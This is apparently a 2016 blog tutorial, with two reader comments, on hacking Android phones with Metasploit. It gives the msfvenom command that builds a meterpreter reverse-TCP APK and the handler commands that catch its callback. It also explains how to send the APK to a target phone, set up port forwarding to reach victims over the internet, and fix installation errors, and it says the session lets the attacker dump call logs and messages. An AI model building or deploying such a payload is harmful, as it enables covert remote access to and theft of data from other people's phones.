Thursday, 13 October 2016

Hacking android with Metasploit in Kali Linux

Let’s Hack android with metasploit in Kali Linux – It’s very easy
Open your terminals and type in-

Msfvenom –p android/meterpreter/reverse_tcp LHOST=your ip LPORT=4444 R > filename.apk

This will create an apk file in Home directory.

• -p => Specify Payload
• LHOST => Your IP or DDNS
• LPORT => Port you want to listen on
• R => Means RAW Format
• >/root/FILENAME.apk => Location for File

There will be some error about architecture but its ok, let it be.

Easy As That

Now the apk should be on target phone. Mail it or send it to the target by Bluetooth or share it or something like that.
Now before running that app on your target android phone, you have to start a handler. 

You can do that using – type in

1.        Msfconsole (opens up metasploit)
2.        use exploit/multi/handler
3.        set payload android/meterpreter/reverse_tcp
4.        set LHOST (your ip)
5.        set LPORT 4444
6.        exploit

Now run the app on your android phone and you'll get a meterpreter session opened!!
Now you can dump data like phone logs, messages etc…
Before installing the app, Please tick "Allow installation from Unknown Sources" from Settings.

It's really easy and almost the same.
First you need to get your public IP.
You also need your private ip. Use ifconfig command in terminal to get that.
Now there are just two small changes in the above steps
i) In the msfvenom command, in LHOST, you need to enter your 'PUBLIC IP'
ii) When creating a listener/handler, in LHOST, you need to enter your 'PRIVATE IP'

That's IT
NOTE – You Need to Port forward The Port you used in your modem/router or it won't work.

2) Apk File made from msfvenom is 0 kb
That means you have some spelling or syntax error. Please recheck the command you entered, if it’s correct, recheck again!!

3) In Phone – Cannot Parse Package
Try Another File Manager, Download a free one from google store!!

4) In Phone – App Not Installed
You May Need to Sign Your APK file, newer android versions may give error. 

5) Kali as Virtual Machine
Virtual Box is known to cause problems, so use VMWare if possible. Also Please DONT USE NAT MODE, USE BRIDGED!!
If there’s any other problem, type in the comment!! I'll try my best to help!


  1. HI there , i tried this but when the .apk file opend at the victim side on the android no session started at mine , what that means ? ,, you may contact me at or here , thank you for your great posts as well

  2. what is the error you are getting ? can you send me a screenshot mate ?